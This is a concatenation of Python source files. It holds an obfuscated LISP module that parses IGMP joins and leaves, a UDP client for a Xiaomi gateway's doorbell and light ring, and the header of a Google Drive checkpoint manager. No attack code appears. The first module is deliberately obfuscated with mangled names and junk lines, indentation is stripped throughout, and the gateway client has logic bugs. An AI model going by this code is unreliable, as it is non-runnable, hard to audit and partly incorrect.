if 53 - 53: i1IIi * iIii1I11I1II1 . OOooOOo
if 68 - 68: IiII % IiII - iII111i . IiII + OoooooooOO
if 82 - 82: Ii1I . II111iiii / i1IIi * OoO0O00
if 80 - 80: I11i
if 96 - 96: i1IIi - I1ii11iIi11i * iII111i . OOooOOo . OoO0O00
if 93 - 93: oO0o * Oo0Ooo * IiII
if 26 - 26: o0oOOo0O0Ooo + O0 % i11iIiiIii . ooOoO0o . I1IiiI + Oo0Ooo
if 90 - 90: IiII * OoooooooOO + II111iiii / iII111i + i11iIiiIii / ooOoO0o
if 20 - 20: II111iiii % I1ii11iIi11i - OoooooooOO * Ii1I / I11i - OoooooooOO
if 11 - 11: I1IiiI + Ii1I + i11iIiiIii * I1ii11iIi11i - oO0o
if 46 - 46: OoooooooOO - Oo0Ooo
if 4 - 4: II111iiii . OOooOOo - Ii1I - i11iIiiIii
if 27 - 27: iII111i * iII111i - OoO0O00 % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 64 - 64: I1ii11iIi11i * ooOoO0o - OoooooooOO - I1IiiI
if 59 - 59: I1ii11iIi11i . I1Ii111 - OOooOOo / Oo0Ooo + OOooOOo . I1ii11iIi11i
if 69 - 69: Oo0Ooo
if 34 - 34: I1Ii111 - ooOoO0o . o0oOOo0O0Ooo
if 52 - 52: o0oOOo0O0Ooo % I11i * I11i / iIii1I11I1II1
if 77 - 77: OoOoOO00
if 67 - 67: OoooooooOO / OoooooooOO + IiII - ooOoO0o
if 72 - 72: Ii1I
if 21 - 21: ooOoO0o + iII111i
if 39 - 39: o0oOOo0O0Ooo % I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo
if 78 - 78: OoO0O00 / o0oOOo0O0Ooo / O0 % OOooOOo % i1IIi
if 78 - 78: o0oOOo0O0Ooo - oO0o . II111iiii
if 67 - 67: iII111i + I11i - OoO0O00 . OOooOOo * iIii1I11I1II1
if 44 - 44: OoooooooOO * i1IIi % i1IIi - i11iIiiIii % OOooOOo - OoO0O00
if 62 - 62: OOooOOo + OoooooooOO / I1Ii111 % iIii1I11I1II1
if 59 - 59: i11iIiiIii . IiII
if 91 - 91: Oo0Ooo / iII111i + I1Ii111
if 32 - 32: i1IIi - iII111i + o0oOOo0O0Ooo * I1Ii111 % I1ii11iIi11i / i11iIiiIii
if 91 - 91: IiII / OoooooooOO . OoooooooOO + OoooooooOO * I1ii11iIi11i . OoOoOO00
if 22 - 22: iIii1I11I1II1 - OoO0O00
if 77 - 77: I1IiiI + IiII - oO0o - I1ii11iIi11i * II111iiii + i1IIi
if 79 - 79: I1ii11iIi11i + O0 * OoooooooOO
if 43 - 43: I11i
if 29 - 29: o0oOOo0O0Ooo / I11i
if 88 - 88: OoOoOO00 - Ii1I . O0 % I1Ii111 % I1ii11iIi11i
if 56 - 56: OoOoOO00 - iIii1I11I1II1 / I1IiiI - i1IIi / o0oOOo0O0Ooo * I11i
if 70 - 70: OOooOOo
if 11 - 11: I11i * II111iiii * Oo0Ooo + OOooOOo % i1IIi
if 73 - 73: OoO0O00 + O0 / Ii1I . OoooooooOO % iIii1I11I1II1 * i1IIi
if 84 - 84: o0oOOo0O0Ooo . iII111i / o0oOOo0O0Ooo + I1ii11iIi11i % OoO0O00
if 52 - 52: OoOoOO00 / Ii1I % OoOoOO00 % i11iIiiIii + I1IiiI / o0oOOo0O0Ooo
if 63 - 63: I1IiiI
if 20 - 20: oO0o + OoOoOO00
if 32 - 32: o0oOOo0O0Ooo % oO0o % I1IiiI * OoooooooOO
if 4 - 4: OOooOOo % oO0o
if 18 - 18: Ii1I * I11i
if 14 - 14: ooOoO0o . ooOoO0o * OoOoOO00 * o0oOOo0O0Ooo - iII111i - I1Ii111
if 53 - 53: Oo0Ooo * OoOoOO00 * II111iiii % IiII - I1ii11iIi11i
if 56 - 56: Oo0Ooo . I1ii11iIi11i - i11iIiiIii / iIii1I11I1II1 . ooOoO0o
if 28 - 28: OoooooooOO + I1IiiI / oO0o . iIii1I11I1II1 - oO0o
if 64 - 64: I1Ii111 + Oo0Ooo / iII111i
if 61 - 61: Ii1I * Ii1I . OoOoOO00 + OoO0O00 * i11iIiiIii * OoO0O00
if 4 - 4: OoooooooOO % iII111i % Oo0Ooo * IiII % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 66 - 66: I1IiiI . Oo0Ooo - oO0o
if 53 - 53: oO0o / Ii1I + oO0o + II111iiii
if 70 - 70: OoooooooOO - I1Ii111 + OoOoOO00
if 61 - 61: I1IiiI * I1Ii111 * i11iIiiIii
if 68 - 68: OoOoOO00 - iII111i - I1IiiI
if 37 - 37: iII111i - I1Ii111 + i1IIi / o0oOOo0O0Ooo % iII111i / iII111i
if 8 - 8: i1IIi % I11i
if 12 - 12: ooOoO0o / II111iiii + ooOoO0o * I1ii11iIi11i / i1IIi - iIii1I11I1II1
if 71 - 71: IiII - i11iIiiIii
igmp_types = { 17 : "IGMP-query" , 18 : "IGMPv1-report" , 19 : "DVMRP" ,
20 : "PIMv1" , 22 : "IGMPv2-report" , 23 : "IGMPv2-leave" ,
30 : "mtrace-response" , 31 : "mtrace-request" , 34 : "IGMPv3-report" }
if 3 - 3: i11iIiiIii - o0oOOo0O0Ooo / oO0o . OoO0O00 * I11i + o0oOOo0O0Ooo
lisp_igmp_record_types = { 1 : "include-mode" , 2 : "exclude-mode" ,
3 : "change-to-include" , 4 : "change-to-exclude" , 5 : "allow-new-source" ,
6 : "block-old-sources" }
if 18 - 18: OoooooooOO % oO0o / IiII - ooOoO0o
def lisp_process_igmp_packet ( packet ) :
oo00Oo0 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
oo00Oo0 . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
oo00Oo0 = bold ( "from {}" . format ( oo00Oo0 . print_address_no_iid ( ) ) , False )
if 80 - 80: I11i
i11iII1IiI = bold ( "Receive" , False )
lprint ( "{} {}-byte {}, IGMP packet: {}" . format ( i11iII1IiI , len ( packet ) , oo00Oo0 ,
lisp_format_packet ( packet ) ) )
if 98 - 98: iII111i / I1ii11iIi11i
if 87 - 87: iII111i - O0 * ooOoO0o / II111iiii % OoooooooOO . o0oOOo0O0Ooo
if 55 - 55: OOooOOo - o0oOOo0O0Ooo * I1IiiI / o0oOOo0O0Ooo + I1Ii111 + iIii1I11I1II1
if 3 - 3: II111iiii % iII111i / IiII * ooOoO0o . OoooooooOO
O0OoOOOooO0Oo = ( struct . unpack ( "B" , packet [ 0 ] ) [ 0 ] & 0x0f ) * 4
if 47 - 47: IiII * ooOoO0o
if 22 - 22: oO0o / O0
if 63 - 63: i1IIi + OoO0O00
if 11 - 11: OOooOOo / I1ii11iIi11i . OOooOOo + i1IIi - OoooooooOO * II111iiii
O00Oo0OOoO = packet [ O0OoOOOooO0Oo : : ]
ooo0oo0Ooo0 = struct . unpack ( "B" , O00Oo0OOoO [ 0 ] ) [ 0 ]
if 90 - 90: O0 - IiII * i1IIi / Ii1I + oO0o - OOooOOo
if 5 - 5: i11iIiiIii % OoooooooOO - Ii1I
if 31 - 31: OOooOOo + ooOoO0o
if 76 - 76: IiII + Ii1I
if 64 - 64: Oo0Ooo % O0
O0o00oOOOO00 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
O0o00oOOOO00 . address = socket . ntohl ( struct . unpack ( "II" , O00Oo0OOoO [ : 8 ] ) [ 1 ] )
iI1i1iIi1iiII = O0o00oOOOO00 . print_address_no_iid ( )
if 66 - 66: O0 + I1IiiI % iIii1I11I1II1 . i1IIi % II111iiii - i1IIi
if ( ooo0oo0Ooo0 == 17 ) :
lprint ( "IGMP Query for group {}" . format ( iI1i1iIi1iiII ) )
return ( True )
if 93 - 93: O0 + OoooooooOO % IiII % oO0o % I1ii11iIi11i
if 36 - 36: I1IiiI - oO0o * Oo0Ooo + oO0o % iII111i - i11iIiiIii
ooiIII = ( ooo0oo0Ooo0 in ( 0x12 , 0x16 , 0x17 , 0x22 ) )
if ( ooiIII == False ) :
ooOO0OOo0o = "{} ({})" . format ( ooo0oo0Ooo0 , igmp_types [ ooo0oo0Ooo0 ] ) if igmp_types . has_key ( ooo0oo0Ooo0 ) else ooo0oo0Ooo0
if 41 - 41: iII111i - OoO0O00
lprint ( "IGMP type {} not supported" . format ( ooOO0OOo0o ) )
return ( [ ] )
if 74 - 74: I1ii11iIi11i . OoO0O00 % Oo0Ooo / oO0o
if 43 - 43: iIii1I11I1II1
if ( len ( O00Oo0OOoO ) < 8 ) :
lprint ( "IGMP message too small" )
return ( [ ] )
if 79 - 79: O0 % ooOoO0o - OoOoOO00 / I1Ii111
if 85 - 85: iII111i % OOooOOo . OoooooooOO % O0 % O0
if 72 - 72: o0oOOo0O0Ooo * IiII / II111iiii / iIii1I11I1II1
if 41 - 41: iII111i / Ii1I
if 11 - 11: Oo0Ooo % OOooOOo . ooOoO0o
if ( ooo0oo0Ooo0 == 0x17 ) :
lprint ( "IGMPv2 leave (*, {})" . format ( bold ( iI1i1iIi1iiII , False ) ) )
return ( [ [ None , iI1i1iIi1iiII , False ] ] )
if 24 - 24: IiII / Oo0Ooo
if ( ooo0oo0Ooo0 in ( 0x12 , 0x16 ) ) :
lprint ( "IGMPv{} join (*, {})" . format ( 1 if ( ooo0oo0Ooo0 == 0x12 ) else 2 , bold ( iI1i1iIi1iiII , False ) ) )
if 90 - 90: ooOoO0o . OOooOOo - Ii1I
if 60 - 60: i11iIiiIii % iII111i . I1IiiI * I1ii11iIi11i
if 30 - 30: Ii1I + i11iIiiIii . I11i + o0oOOo0O0Ooo - OoO0O00
if 55 - 55: ooOoO0o - II111iiii . ooOoO0o . iII111i / OoooooooOO
if 51 - 51: I1IiiI * I1Ii111 - ooOoO0o + IiII
if ( iI1i1iIi1iiII . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
else :
return ( [ [ None , iI1i1iIi1iiII , True ] ] )
if 22 - 22: OoOoOO00 % Ii1I + iII111i
if 64 - 64: ooOoO0o
if 87 - 87: IiII - Ii1I / Oo0Ooo / I1ii11iIi11i . iII111i
if 49 - 49: IiII * OoooooooOO * iIii1I11I1II1 * Oo0Ooo / iII111i % oO0o
if 88 - 88: I1Ii111 * OOooOOo
return ( [ ] )
if 38 - 38: Oo0Ooo - OoooooooOO - OoooooooOO / II111iiii
if 10 - 10: II111iiii - OoO0O00 / II111iiii % Ii1I - OoOoOO00
if 90 - 90: I11i + II111iiii - oO0o - ooOoO0o / ooOoO0o / i11iIiiIii
if 80 - 80: I1ii11iIi11i % O0 / II111iiii + iII111i
if 22 - 22: Oo0Ooo + ooOoO0o . OOooOOo % Oo0Ooo . IiII
o0oo0OoOo000 = O0o00oOOOO00 . address
O00Oo0OOoO = O00Oo0OOoO [ 8 : : ]
if 34 - 34: Ii1I . OoOoOO00 - OOooOOo * Oo0Ooo - ooOoO0o . oO0o
iiIII1 = "BBHI"
i11iIi1 = struct . calcsize ( iiIII1 )
O0o0oo = "I"
IIi1111 = struct . calcsize ( O0o0oo )
oo00Oo0 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 36 - 36: I1ii11iIi11i + I1ii11iIi11i + I11i
if 61 - 61: OoooooooOO / Oo0Ooo + II111iiii
if 93 - 93: O0 * iIii1I11I1II1 % ooOoO0o . o0oOOo0O0Ooo
if 13 - 13: iIii1I11I1II1
i1IIIIi1I = [ ]
for IiIIi1IiiIiI in range ( o0oo0OoOo000 ) :
if ( len ( O00Oo0OOoO ) < i11iIi1 ) : return
II1IoOo0 , O0o000 , iII , ii1i1II11II1i = struct . unpack ( iiIII1 ,
O00Oo0OOoO [ : i11iIi1 ] )
if 3 - 3: iII111i / oO0o * II111iiii
O00Oo0OOoO = O00Oo0OOoO [ i11iIi1 : : ]
if 21 - 21: o0oOOo0O0Ooo / I1ii11iIi11i
if ( lisp_igmp_record_types . has_key ( II1IoOo0 ) == False ) :
lprint ( "Invalid record type {}" . format ( II1IoOo0 ) )
continue
if 48 - 48: i11iIiiIii % I1ii11iIi11i
if 73 - 73: OoOoOO00 + O0 + I1IiiI . iIii1I11I1II1 / I1ii11iIi11i
o0OOOo = lisp_igmp_record_types [ II1IoOo0 ]
iII = socket . ntohs ( iII )
O0o00oOOOO00 . address = socket . ntohl ( ii1i1II11II1i )
iI1i1iIi1iiII = O0o00oOOOO00 . print_address_no_iid ( )
if 19 - 19: IiII . I11i + oO0o
lprint ( "Record type: {}, group: {}, source-count: {}" . format ( o0OOOo , iI1i1iIi1iiII , iII ) )
if 24 - 24: OoOoOO00 . I1IiiI / Ii1I
if 42 - 42: I1Ii111 / I1ii11iIi11i
if 1 - 1: OOooOOo
if 48 - 48: I1IiiI / OoooooooOO % I11i * Oo0Ooo
if 20 - 20: Oo0Ooo
if 85 - 85: I1Ii111
if 98 - 98: OoO0O00 - IiII % iIii1I11I1II1 . OoOoOO00 + i1IIi + OoooooooOO
III11i1i1i11 = False
if ( II1IoOo0 in ( 1 , 5 ) ) : III11i1i1i11 = True
if ( II1IoOo0 in ( 2 , 4 ) and iII == 0 ) : III11i1i1i11 = True
iiiIi1 = "join" if ( III11i1i1i11 ) else "leave"
if 97 - 97: i11iIiiIii - O0 * o0oOOo0O0Ooo - IiII + I1IiiI
if 7 - 7: oO0o + I1Ii111 . o0oOOo0O0Ooo / IiII + iIii1I11I1II1 % I1Ii111
if 24 - 24: i11iIiiIii + iIii1I11I1II1
if 22 - 22: i11iIiiIii . II111iiii / o0oOOo0O0Ooo / Ii1I . O0 . OoOoOO00
if ( iI1i1iIi1iiII . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
continue
if 89 - 89: O0 * Oo0Ooo + I1Ii111 + ooOoO0o * OoOoOO00
if 20 - 20: OoO0O00 - OoOoOO00
if 84 - 84: iIii1I11I1II1 + ooOoO0o . o0oOOo0O0Ooo % iII111i
if 35 - 35: I11i - oO0o * oO0o / OoooooooOO + iII111i + OoOoOO00
if 48 - 48: I1Ii111 / o0oOOo0O0Ooo - OOooOOo / o0oOOo0O0Ooo % O0
if 38 - 38: OoO0O00 + o0oOOo0O0Ooo / OoO0O00
if 74 - 74: oO0o - i1IIi . Oo0Ooo / I1IiiI + o0oOOo0O0Ooo . OoOoOO00
if 35 - 35: iII111i / Ii1I
if ( iII == 0 ) :
i1IIIIi1I . append ( [ None , iI1i1iIi1iiII , III11i1i1i11 ] )
lprint ( "IGMPv3 {} (*, {})" . format ( bold ( iiiIi1 , False ) ,
bold ( iI1i1iIi1iiII , False ) ) )
if 57 - 57: ooOoO0o . I1IiiI * OOooOOo
if 87 - 87: I11i - I11i % iII111i - Ii1I
if 29 - 29: oO0o - ooOoO0o * iIii1I11I1II1 / OoOoOO00
if 34 - 34: I1IiiI . Oo0Ooo
if 4 - 4: Ii1I - II111iiii * iII111i / oO0o - I1IiiI
for oOoOoO0O in range ( iII ) :
if ( len ( O00Oo0OOoO ) < IIi1111 ) : return
ii1i1II11II1i = struct . unpack ( O0o0oo , O00Oo0OOoO [ : IIi1111 ] ) [ 0 ]
oo00Oo0 . address = socket . ntohl ( ii1i1II11II1i )
ii1II11I = oo00Oo0 . print_address_no_iid ( )
i1IIIIi1I . append ( [ ii1II11I , iI1i1iIi1iiII , III11i1i1i11 ] )
lprint ( "{} ({}, {})" . format ( iiiIi1 ,
green ( ii1II11I , False ) , bold ( iI1i1iIi1iiII , False ) ) )
O00Oo0OOoO = O00Oo0OOoO [ IIi1111 : : ]
if 93 - 93: O0 . I1IiiI % I1IiiI * oO0o % I1Ii111 * Ii1I
if 85 - 85: I1Ii111 % I11i + iII111i
if 83 - 83: iIii1I11I1II1 - IiII * o0oOOo0O0Ooo . i11iIiiIii
if 4 - 4: iIii1I11I1II1 - Ii1I
if 46 - 46: OOooOOo / iII111i . i1IIi . i11iIiiIii . iIii1I11I1II1 % I11i
if 62 - 62: I11i % II111iiii % OoooooooOO * ooOoO0o / oO0o
if 29 - 29: o0oOOo0O0Ooo / O0 / OoO0O00
if 23 - 23: Ii1I + i11iIiiIii % IiII
return ( i1IIIIi1I )
if 64 - 64: i11iIiiIii + OoooooooOO . oO0o * Ii1I
if 49 - 49: O0
if 72 - 72: I1Ii111
if 96 - 96: II111iiii / OOooOOo % i1IIi / Oo0Ooo
if 22 - 22: I1IiiI % iIii1I11I1II1 % I1ii11iIi11i
if 68 - 68: iII111i + I11i
if 61 - 61: oO0o . I1Ii111
if 74 - 74: O0 . Ii1I - iII111i % IiII + II111iiii
lisp_geid = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 71 - 71: oO0o + Ii1I % oO0o
def lisp_glean_map_cache ( seid , rloc , encap_port , igmp ) :
if 17 - 17: I1Ii111 % I1Ii111 * o0oOOo0O0Ooo
if 84 - 84: I1Ii111 + iII111i . i1IIi / O0 / I1Ii111 + o0oOOo0O0Ooo
if 70 - 70: O0 % ooOoO0o - iII111i + oO0o
if 12 - 12: I1Ii111 - OoO0O00 % II111iiii % ooOoO0o / II111iiii % OoOoOO00
if 74 - 74: iII111i . OOooOOo * Ii1I / Oo0Ooo . OoO0O00 . I11i
if 65 - 65: i11iIiiIii - OoO0O00 / OoooooooOO * I1IiiI % iII111i
i1i11111iiII1 = True
IiiiiII1i = lisp_map_cache . lookup_cache ( seid , True )
if ( IiiiiII1i and len ( IiiiiII1i . rloc_set ) != 0 ) :
IiiiiII1i . last_refresh_time = lisp_get_timestamp ( )
if 30 - 30: O0 - I11i
OOiiIiiII11i1ii = IiiiiII1i . rloc_set [ 0 ]
II1iI1iI = OOiiIiiII11i1ii . rloc
OO00o0Oo = OOiiIiiII11i1ii . translated_port
i1i11111iiII1 = ( II1iI1iI . is_exact_match ( rloc ) == False or
OO00o0Oo != encap_port )
if 62 - 62: Ii1I
if ( i1i11111iiII1 ) :
oOo = green ( seid . print_address ( ) , False )
i11iII1IiI = red ( rloc . print_address_no_iid ( ) + ":" + str ( encap_port ) , False )
lprint ( "Change gleaned EID {} to RLOC {}" . format ( oOo , i11iII1IiI ) )
OOiiIiiII11i1ii . delete_from_rloc_probe_list ( IiiiiII1i . eid , IiiiiII1i . group )
lisp_change_gleaned_multicast ( seid , rloc , encap_port )
if 30 - 30: iII111i % O0 + II111iiii * I1IiiI
else :
IiiiiII1i = lisp_mapping ( "" , "" , [ ] )
IiiiiII1i . eid . copy_address ( seid )
IiiiiII1i . mapping_source . copy_address ( rloc )
IiiiiII1i . map_cache_ttl = LISP_GLEAN_TTL
IiiiiII1i . gleaned = True
oOo = green ( seid . print_address ( ) , False )
i11iII1IiI = red ( rloc . print_address_no_iid ( ) + ":" + str ( encap_port ) , False )
lprint ( "Add gleaned EID {} to map-cache with RLOC {}" . format ( oOo , i11iII1IiI ) )
IiiiiII1i . add_cache ( )
if 91 - 91: i11iIiiIii
if 35 - 35: OoOoOO00 * I1Ii111 / Oo0Ooo - i1IIi - IiII + OOooOOo
if 96 - 96: Oo0Ooo + I1ii11iIi11i . O0
if 62 - 62: i1IIi % OoooooooOO % OoooooooOO
if 53 - 53: O0 * oO0o
if ( i1i11111iiII1 ) :
iIII = lisp_rloc ( )
iIII . store_translated_rloc ( rloc , encap_port )
iIII . add_to_rloc_probe_list ( IiiiiII1i . eid , IiiiiII1i . group )
iIII . priority = 253
iIII . mpriority = 255
ooo0oo = [ iIII ]
IiiiiII1i . rloc_set = ooo0oo
IiiiiII1i . build_best_rloc_set ( )
if 22 - 22: OOooOOo % Oo0Ooo % ooOoO0o - O0 + i1IIi
if 67 - 67: OoO0O00 / I1IiiI - IiII + iII111i - iII111i
if 4 - 4: IiII . Ii1I . IiII % OoO0O00
if 12 - 12: OoOoOO00 + O0 / O0 . i1IIi
if 58 - 58: IiII . iII111i % O0 . Ii1I * Oo0Ooo
if ( igmp == None ) : return
if 54 - 54: OoO0O00 % OOooOOo - OoO0O00 . Oo0Ooo % i1IIi
if 95 - 95: iII111i . OoooooooOO . o0oOOo0O0Ooo / II111iiii - OoooooooOO / I1Ii111
if 11 - 11: II111iiii / iII111i . oO0o / ooOoO0o / OOooOOo + OoO0O00
if 37 - 37: iIii1I11I1II1 * O0
if 64 - 64: I1Ii111 - II111iiii + oO0o % ooOoO0o * oO0o
lisp_geid . instance_id = seid . instance_id
if 27 - 27: iIii1I11I1II1 - Ii1I . i11iIiiIii / IiII . I1Ii111 / i11iIiiIii
if 27 - 27: OoOoOO00 . I11i / OoOoOO00
if 96 - 96: OoO0O00 - I1IiiI
if 73 - 73: I1IiiI - o0oOOo0O0Ooo - I1Ii111
if 34 - 34: iIii1I11I1II1 - i1IIi + OoO0O00 % Oo0Ooo + i1IIi
oOooiIIIii1Ii1Ii1 = lisp_process_igmp_packet ( igmp )
if ( type ( oOooiIIIii1Ii1Ii1 ) == bool ) : return
if 46 - 46: I1IiiI
for oo00Oo0 , O0o00oOOOO00 , III11i1i1i11 in oOooiIIIii1Ii1Ii1 :
if ( oo00Oo0 != None ) : continue
if 82 - 82: iII111i . i1IIi
if 38 - 38: Ii1I . I1IiiI . I1ii11iIi11i
if 26 - 26: O0 - II111iiii * I1Ii111 - OoOoOO00
if 96 - 96: I11i * Oo0Ooo / OOooOOo - IiII
lisp_geid . store_address ( O0o00oOOOO00 )
Ii1iIIi1I1II1I , O0o000 , o00oo0 = lisp_allow_gleaning ( seid , lisp_geid , rloc )
if ( Ii1iIIi1I1II1I == False ) : continue
if 75 - 75: OoooooooOO - O0
if ( III11i1i1i11 ) :
lisp_build_gleaned_multicast ( seid , lisp_geid , rloc , encap_port ,
True )
else :
lisp_remove_gleaned_multicast ( seid , lisp_geid )
if 39 - 39: i11iIiiIii / Ii1I / ooOoO0o
if 93 - 93: o0oOOo0O0Ooo - Oo0Ooo / oO0o / OoOoOO00
if 75 - 75: o0oOOo0O0Ooo * ooOoO0o % Ii1I
if 94 - 94: OoooooooOO + II111iiii / iIii1I11I1II1 * ooOoO0o
if 85 - 85: ooOoO0o / IiII
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
__init__.py | from multiprocessing import Queue
import threading
import logging
import json
import socket
import time
class doorbell:
def __init__(self, parent):
self.parent = parent
self.logger = parent.logger
self.sound = 10
self.volume = 10
## TODO: rewrite
def set_doorbell_sound(self, sound, volume):
if sound:
self.sound = sound
param = [1, str(self.sound)]
self.parent.queue_cmd('set_doorbell_sound', param, True)
if volume:
self.volume = volume
self.parent.queue_cmd('set_doorbell_volume', [self.volume])
def set_doorbell_push(self, push):
if push != 'on' or push != 'off':
self.logger.error('Invalid doorbell param')
self.parent.queue_cmd('set_doorbell_push', push, True)
def get_doorbell_push(self):
self.parent.queue_cmd('get_doorbell_push', None, True)
class alarm:
def __init__(self, parent):
self.parent = parent
class clock:
def __init__(self, parent):
self.parent = parent
class lightring:
def __init__(self, parent):
self.parent = parent
self.color = 0xffffff
self.brightness = 54
def set_color(self, color):
self.set_all(color, self.brightness)
def set_brightness(self, brightness):
self.set_all(self.color, brightness)
def set_all(self, color, brightness):
self.parent.queue_cmd('set_rgb', (brightness << 24) + int(color, 16), True)
def handle_props(self, props):
for key, value in props.items():
if key == 'rgb':
self.brightness, self.color = divmod(value, 0x1000000)
self.color = self.color ^ self.brightness
class gateway:
def __init__(self, ip, port):
# Network config
self.ip = ip
self.port = port
# Queue
self.queue = Queue(maxsize=100)
# Miio config
self.maxlen = 1480
self.id = 0
# Logger
self.logger = logging.getLogger(__name__)
# Heartbeat timestamps
self.lastping = 0
self.lastpong = 0
self.warn_offline = True
# Socket
self.socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
self.socket.settimeout(1)
# Callback
self.callback = None
# Sub-functions
self.light_ring = lightring(self)
self.doorbell = doorbell(self)
self.alarm = alarm(self)
self.clock = clock(self)
# Msg is a device event
def msg_event(self, msg):
event = '.'.join(msg['method'].split('.')[1:])
data = {
'event': event,
'device_id': msg['sid'],
'device_model': msg['model'],
'params': msg['params']
}
self.logger.debug(f'callback for event {event}')
self.callback('event', data)
def msg_props(self, msg):
data = {
'device_id': msg.get('sid'),
'device_model': msg['model'] if 'model' in msg else 'internal',
'props': msg['params']
}
# Props dispatcher, for own properties
if data['device_model'] in ['internal', 'lumi.gateway.mieu01']:
if 'rgb' in data['props']:
self.light_ring.handle_props(data['props'])
# Discard device_log properties
if 'device_log' in data['props']:
return
self.logger.debug(f'callback for {data["device_model"]} properties')
self.callback('properties', data)
def msg_otc(self, msg):
data = {
'device_id': msg.get('sid'),
'device_model': msg['model'] if 'model' in msg else 'internal',
'status': msg['params']
}
self.logger.debug(f'callback for {data["device_model"]} status')
self.callback('status', data)
def recv_msg(self, msg):
method = msg.get('method')
# If there's no method, there's nothing to handle
if not method:
self.logger.warning(f'msg with no method: {msg}')
return
# Remove id (useless)
del msg['id']
# Msg dispatcher
self.logger.debug(f'msg=> {msg}')
## Keepalive events => DGAF
if method == 'event.keepalive':
return
## local events (query_time, query_status, time, status) => DGAF
elif method.startswith('local.'):
return
## sync events (getUserSceneInfo, upLocalSceneRunningLog, check_dev_version, neighborDevInfo) => DGAF
elif method.startswith('_sync.'):
return
## async events (store) => DGAF
elif method.startswith('_async.'):
return
## props (properties???)
## don't know what to do with that
## apparently, if there's no model, it's internal
elif method == 'props':
self.msg_props(msg)
## otc events (log) => parse device status
elif method.startswith('_otc.'):
self.msg_otc(msg)
## pong/heartbeat => just update the timer
elif method == 'internal.PONG' or method == 'event.heartbeat':
self.pong()
## device event => handle that in dedicated function
elif method.startswith('event.'):
self.msg_event(msg)
## that should not happen
else:
self.logger.warn(f'unknown event {method} received')
def msg_decode(self, data):
#self.logger.debug(f'Decode called with {data.decode()}')
if data[-1] == 0:
data = data[:-1]
res = [{''}]
try:
fixed_str = data.decode().replace('}{', '},{')
res = json.loads(f'[{fixed_str}]')
except:
self.logger.warning('Bad JSON received')
return res
def msg_encode(self, data):
if data.get('method', '') == "internal.PING":
msg = data
else:
if self.id != 12345:
self.id = self.id + 1
else:
self.id = self.id + 2
if self.id > 999999999:
self.id = 1
msg = {'id': self.id}
msg.update(data)
return json.dumps(msg).encode()
def callback(self, topic, value):
if self.callback:
self.callback(topic, value)
else:
self.logger.warning('no callback function defined')
def set_callback(self, callback):
self.callback = callback
def send_cmd(self, cmd, params = None, expect_result = False):
self.logger.debug(f'sending cmd {cmd} (params={params})')
data = {}
if params:
encoded = self.msg_encode({'method': cmd, 'params': params})
else:
encoded = self.msg_encode({'method': cmd})
self.socket.sendto(encoded, (self.ip, self.port))
self.socket.settimeout(2)
# Wait for result
try:
msgs = self.msg_decode(self.socket.recvfrom(self.maxlen)[0])
while len(msgs) > 0:
msg = msgs.pop()
if expect_result and 'result' in msg:
self.logger.debug(f'got result for cmd {cmd}')
data = {'cmd': cmd, 'result': msg['result'][0]}
if not cmd == 'internal.PING':
self.callback(f'result', data)
else:
# Other message/event
self.recv_msg(msg)
except socket.timeout:
self.logger.warning(f'no reply for cmd {cmd}')
self.socket.settimeout(1)
return data
def queue_cmd(self, cmd, params = None, expect_result = False):
self.queue.put({'cmd': cmd, 'params': params, 'expect_result': expect_result})
def ping(self):
self.queue_cmd('internal.PING', None, True)
self.lastping = time.time()
def pong(self):
self.logger.debug('hearbeat received')
self.lastpong = time.time()
def run(self):
while self.thread_running:
# Manage hearbeat (ping)
if (time.time() - self.lastping) > 200:
self.ping()
self.warn_offline = True
# Send queued messages
while not self.queue.empty():
req = self.queue.get()
res = self.send_cmd(req['cmd'], req.get('params'), req.get('expect_result', False))
if req['cmd'] == 'internal.PING' and res.get('result') == 'online':
self.pong()
# Receive messages
try:
msgs = self.msg_decode(self.socket.recvfrom(self.maxlen)[0])
while len(msgs) > 0:
self.recv_msg(msgs.pop())
except socket.timeout:
pass
# Manage heartbeat (pong)
if (time.time() - self.lastpong) > 300:
if self.warn_offline:
self.logger.debug('gateway is offline!')
self.warn_offline = False
def start(self):
self.thread_running = True
self.thread = threading.Thread(target=self.run, daemon=True)
self.thread.start()
def stop(self):
self.thread_running = False
|
drive_manager.py | """
********************************
* Created by mohammed-alaa *
********************************
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
DISCLAIMER:
this class can access/delete/create your drive account by providing a credentials file >not< your mail and PW of course
You have to revise this class to make sure it doesn't do any illegal things to your data >> it's really safe don't worry :)
********************************
drive manager: connects with drive api on colab which have very high speed network :D 30 MBps :D
You need credentials files from drive api
This can upload and download files from your drive and save check points while training on Colab efficiently and resume your training on any other machine :3
IMPORTANT these files are confidential don't share them or they have control on your drive account !
********************************
To use this:
1.just create a folder on your drive and replace personal_dfolder
you need to know base_download_dfolder is owned my mohammed.a.elkomy and you can access all of its public experiments (the code can access it and you can resume from my experiments :D)
2.obtain your credential file/files and name them as cred* for example cred1.txt cred_mohammed.txt or any thing cred*.txt
3.you can use multiple credentials files = multiple drive accounts which matches cred*
4.it will automatically push your checkpoints regularly to your personal_dfolder and it can if needed download experiments from base_download_dfolder
********************************
"""
import glob
import os
import shutil
import threading
import time
import zipfile
from pydrive.auth import GoogleAuth # from google
from pydrive.drive import GoogleDrive # from google
from utils.zip_manager import ZipFile
class DriveManager:
# check projects directories
